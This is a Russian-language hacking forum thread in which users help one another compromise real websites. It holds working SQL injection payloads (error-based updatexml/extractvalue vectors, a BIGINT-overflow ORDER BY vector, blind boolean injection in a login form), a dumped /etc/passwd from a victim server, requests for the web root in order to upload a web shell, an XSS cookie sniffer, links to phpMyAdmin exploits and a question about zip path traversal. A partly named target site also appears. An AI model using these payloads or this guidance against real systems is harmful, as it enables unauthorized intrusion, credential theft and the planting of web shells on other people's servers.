Ваши вопросы по уязвимостям.

http://habrahabr.ru/company/dsec/blog/249007/#comment_8247401

 

Насчёт XSS. Делал по этому примеру воспользовался своим шеллом. Отредактировал файл .htaccess создал файл s.php с тем кодом и имедж ..Потом решил на себе поэкспериментировать и когда все сделал перешел по вредоносной ссылке.. но в итоге пришел отчет на почту только IP а куки были ПУСТЫ
вроде все правильно настроил, раз отчет пришел Ноо.. И еще вопрос когда перехожу на ссылку отображается сайт и уязвимое место и весь код в расшифрованном виде.. т.е видно где залит сниффер

 

В данном скрипте раскрутить можно только через ошибку, так как уязвимый параметр участвует в 2-х запросах с разным количеством полей:

Code:

[I]SELECT count(*)[/i][i] from images wher[/i][i]e (match(filename,des[/i][i]cription,supplemen[/i][i]talcategories,t[/i][i]itle,keywords,credi[/i][i]t) against('("INJ")[/i][i]' IN BOOLEAN MODE)) AN[/i][i]D (archive='Archive[/i][i]') ORDER BY last[/i][i]modified DESC[/i][i], id DESC LI[/i][i]MIT 2000[/i][i]

SELECT f[/i][i]ilename,fu[/i][i]llpath,de[/i][i]scription,titl[/i][i]e,keywords,credit f[/i][i]rom images[/i][i] where  ([/i][i]match(filename,de[/i][i]scription,supplem[/i][i]entalcategories[/i][i],title,k[/i][i]eywords,credit) agai[/i][i]nst('("I[/i][i]NJ")' IN BOOLE[/i][i]AN MODE)) AND [/i][i](archive='[/i][i]Archive') ORDER[/i][i] BY lastmo[/i][i]dified DESC, [/i][i]id DESC LIMIT [/i][i]2000[/i]

Запросы составлены таким образом, что составить универсальный вектор с использованием UNION SELECT нельзя. Пример вывода через ошибку:

Code:

[i]archive=Archive[/i][i]&search=08gp03a'*[/i][i]updatexml(1,concat(0x3[/i][i]A,version()),1)*'&page=9[/i]

[i]archive=Archive&search=%2[/i][i]2%29%27%20IN%2[/i][i]0BOOLEAN%20MOD[/i][i]E%29%29AND%28archive=%27Arc[/i][i]hive%27%29ORDER/**/BY[/i][i]%28SELECT%28i/**/IS/**/NOT/**/NULL[/i][i]%29-%28-922337203685[/i][i]4775808%29[/i][i]FROM%28SELECT%28[/i][i]([COLOR=Red]SELECT version()[/COLOR])[/i][i]%29i%29[/i][i]a%29%20+--+&page=9[/i]

Последний вектор дает 475 байтов вывода.

 

Всем добрый вечер. Ребята помогите раскрыть путь к сайта.

http://subdomain1.subdomain2.domain.com/

web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)
web application technology: Apache 2.2.20, PHP 5.3.6
back-end DBMS: MySQL 5.0

пробовал и нашел:

Code:

/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd

-------------------------------------
Результат ноль:

Code:

 ·         /var/www/html/
·         /var/www/web1/html/
·         /var/www/sitename/htdocs/
·         /var/www/localhost/htdocs
·         /var/www/vhosts/sitename/httpdocs/
·         /etc/init.d/apache
·         /etc/init.d/apache2
·         /etc/httpd/httpd.conf
·         /etc/apache/apache.conf
·         /etc/apache/httpd.conf
·         /etc/apache2/apache2.conf
·         /etc/apache2/httpd.conf
·         /usr/local/apache2/conf/httpd.conf
·         /usr/local/apache/conf/httpd.conf
·         /opt/apache/conf/httpd.conf
·         /home/apache/httpd.conf
·         /home/apache/conf/httpd.conf
·         /etc/apache2/sites-available/default
·         /etc/apache2/vhosts.d/default_vhost.include

---------------------------------------
etc/passwd

Code:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

не могу найти путь к апаче

 

LFI? что, конкретно, нужно? если error_log или access_log, попробуйте /proc/self/fd/2 и /proc/self/fd7 соответственно. да и список путей на ваших не ограничивается: https://forum.antichat.ru/thread324564.html, http://rafale.org/~mattoufoutu/darkc0de.com/c0de/php/DarkLFI.txt
стоит также погуглить на наличие еще возможных путей.

 

извиняюсь, Это не LFI, а скул инъекция вообще то. есть file_priv=Y. мне нужна путь к сайта что бы залить шел. там нету даже пхпинфо или phpmyadmin . Я здесь все пробовал: https://forum.antichat.ru/thread324564.html

 

пройдитесь еще по второму словарю. также, методы для раскрытия путей: https://rdot.org/forum/showthread.php?t=82

 

Есть сайт с версией phpMyAdmin 2.11.11.3 , setup и signon не удаляли.

Попробовал этот сплоит https://rdot.org/forum/showpost.php?p=13736&postcount=6 .

Получил какие-то куки, но после подмены все ровно требует пароль.

Какие вообще есть уязвимости под phpMyAdmin 2.11.11.3?

 

Code:

http://mez{REMOVE THIS}calent.com

Скулы в форме авторизации. Но из-за редиректа не могу норм раскрутить. Ребят, будут подсказки?

 

email=-1'or(mid(version(),1,1)=5)-- &password=qwerty

 

хмм, спасибо, ответ правда тот же:

Code:

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/mezcalent.com/httpdocs/public_actions.php on line 536 

не вижу вывода версии

 

При слепых! инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.

 

http://packetstormsecurity.com/files/121275/phpMyAdmin-Session-Serialized-Code-Execution.html

при mq = off и PHP <= 5.2.13 или PHP <= 5.3.2
https://rdot.org/forum/showpost.php?p=18082&postcount=20

также, попробуйте все из списка: https://www.google.com/search?q=phpMyAdmin+2.11.11.3+exploit

 

Session path was not found =/

Пробовал, не получилось

 

всё, понятно ) Слепая же. Спасибо !!!

 

блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница

 

SELECT mid(password,31,32) FROM oto_admin LIMIT 1

 

спасибо)

 

Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов (475! error-based через begint):

Пример: https://forum.antichat.ru/showpost.php?p=3815102&postcount=23814

 

Есть уязвимый скрипт, который производит распаковку zip-архива, загруженного пользователем.
Можно ли создать zip-архив, который бы распаковывался, например, на диреторию више ("../") ?
Вроде видел пример создания такого архива, но не могу найти.